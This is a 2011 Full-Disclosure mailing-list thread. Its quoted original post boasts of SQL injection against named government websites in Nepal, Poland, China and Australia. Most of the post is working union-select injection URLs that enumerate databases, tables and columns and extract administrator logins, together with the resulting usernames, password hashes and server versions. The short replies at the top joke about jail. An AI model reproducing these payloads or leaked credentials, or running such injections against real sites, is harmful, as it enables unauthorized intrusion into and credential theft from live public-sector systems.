Message-ID: <BANLkTik3uXOLB9qbz2zwvyML_fC5K8CWxA@mail.gmail.com>
Date: Fri, 20 May 2011 09:13:59 +0100
From: Cal Leeming <cal@...whisper.co.uk>
To: tc <toughcrowd@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Governments Websites Pwned !!

Kinda. But I passed the "man up and put your daughter first" class.. handed
myself in and admitted to everything for a fresh start. Worth every second
of jail tbh.

On 19 May 2011 04:02, "tc" <toughcrowd@...il.com> wrote:
> Didn't you already fail that class Cal?
>
> On Wed, May 18, 2011 at 6:03 PM, Cal Leeming <cal@...whisper.co.uk> wrote:
>> Welcome to 101 of "stay out of jail".. Today's topic is: How not to piss
>> off the govt.
>> :|
>>
>> On Wed, May 18, 2011 at 8:54 AM, aryan hacky <aryan.hacky@...il.com> wrote:
>>>
>>> _ _ _ ___ _ _
>>> / \ _ __ | |_(_) |_ _|_ __ | |_ _ __ _ _ __| | ___ _ __ ___
>>>
>>> / _ \ | '_ \| __| |_____| || '_ \| __| '__| | | |/ _` |/ _ \ '__/ __|
>>>
>>> / ___ \| | | | |_| |_____| || | | | |_| | | |_| | (_| | __/ | \__ \
>>> /_/ \_\_| |_|\__|_| |___|_| |_|\__|_| \__,_|\__,_|\___|_| |___/
>>>
>>> .com
>>>
>>>
>>>
>>> Lolzz following GOV sites SQL Injection is working from last years. why
>>> they don't like to patch it !!
>>> Pretty lazy people are in government sectors like their lazy jobs.
>>> Many newbies are learning SQL injection from the Gov. sites :p lolz .. I
>>> think it is time to wake up ..
>>>
>>>
>>>
>>> Here All MySQL Version 5 And Version 4 Websites are injected !
>>>
>>> Special Thanks to Silic0n ....
>>>
>>> Work Done By @r@.....
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
>>>
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,database%28%29,3,4,5,6,7,8,9,10,11,12,13--
>>>
>>>
>>>
>>> DB:eproc_seznepal_gov_np
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20where%20table_schema=database%28%29--
>>>
>>>
>>> TAble:
>>> ---------------------------------------------------------------
>>>
>>>
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat%28table_name,0x3a,column_name%29,3,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> columns:
>>>
>>>
>>>
>>>
>>>
http://www.eproc.seznepal.gov.np/tender_details.php?tid=-49+union+select+1,group_concat(admin_id,0x3a,user_name,0x3a,pass_word),3,4,5,6,7,8,9,10,11,12,13
>>> from tbl_adminlogin--
>>>
>>>
>>>
>>> ARMIN: 1:sez:7a4489303e667e03b6414997b53aa003
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
>>>
http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,database%28%29--
>>>
>>>
>>> DB:national_nm
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> table:admin,events,news
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> col:
>>>
>>>
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.nationalmuseum.gov.np/news.php?id=-272%20union%20select%201,2,group_concat%28username,0x3a,password%29%20from%20admin--
>>>
>>>
>>>
>>> admin pass:admin:*4F7F6D6AF7CD8CD89967918F893DA545DDA85623
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
>>>
http://www.praca.gov.pl/pages/klasyfikacja_zawodow2.php?klasyfikacja_zawodow_id=197%20and%201=2%20union%20select%201,@@version,3,4,5,6%20--
>>>
>>>
>>>
>>> version:5.0.51a-24+lenny5-log
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.praca.gov.pl/pages/klasyfikacja_zawodow2.php?klasyfikacja_zawodow_id=197%20and%201=2%20union%20select%201,group_concat%28table_name%29,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> table:
>>>
>>>
>>>
http://www.praca.gov.pl/pages/klasyfikacja_zawodow2.php?klasyfikacja_zawodow_id=197%20and%201=2%20union%20select%201,group_concat%28column_name%29,3,4,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> col:
>>>
>>>
>>>
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://ncclcs.cma.gov.cn/Website/index.php?ChannelID=-107%20Union%20select%201,unhex%28hex%28@@version%29%29,3,4--%20-
>>>
>>>
>>>
>>> 5.0.18
>>>
>>> http://ncclcs.cma.gov.cn/Website/index.php?ChannelID=-107 Union select
>>> 1,unhex(hex(group_concat(table_name))),3,4
>>> from%20information_schema.tables%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> table:
>>>
>>> http://ncclcs.cma.gov.cn/Website/index.php?ChannelID=-107 Union select
>>> 1,unhex(hex(group_concat(column_name))),3,4 from
information_schema.columns
>>> where table_schema=database()--
>>>
>>>
>>>
>>> col:
>>>
>>>
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>> http://www.uzs.gov.pl/bip/index.php?pg=nt&fidx=302&nidx=266 and 1=2
union
>>> select%201,2,3,4,5 ,6,@@version,8,9,10,11,12,13,14%20--&print=1
>>>
>>>
>>>
>>> 4.1.14-standard-log
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.cgcc.gov.cn/news_view.php?id=-403%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21,22,23
>>>
>>>
>>>
>>> 4.1.22-log
>>>
>>> Getting fucking bored with this JOB. Use your brain.exe
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://www.hdzj.gov.cn/news1.php?id=363+and+1=2+union+select+1,@@version,3,4,5,6,7
>>>
>>>
>>>
>>> 4.0.16-nt
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,concat%28uid,0x3a,pwd%29+from+administrator
>>>
>>>
>>>
>>>
>>>
http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,group_concat(table_name)
>>> from information_schema.tables where table_schema=database()--
>>>
>>>
>>>
>>>
>>>
http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=database%28%29--
>>>
>>>
>>>
>>> admin pass:xsq:920e1c96db4b09a5a9aad48e9780c620
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>>
http://shanxi.cecs.gov.cn/lanmu.php?f_lanmu_id=-4%20UNION%20SELECT%201,2,3,group_concat%28pwd,0x3a,qyname%29,5,6,7,8,9,10,11,12,13,14,15%20from%20chinaeci_new2011.users--
>>>
>>>
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
http://www.shootingcentre.nsw.gov.au/article.php?id=-9%20union+all+select+1,2,3,@@version,5,6,7,8,9,10,12,13,14,15,16,17
>>>
>>>
>>>
>>> version: 4.1.22-standard
>>>
>>> ---------------------------------------------------------------
>>> ---------------------------------------------------------------
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/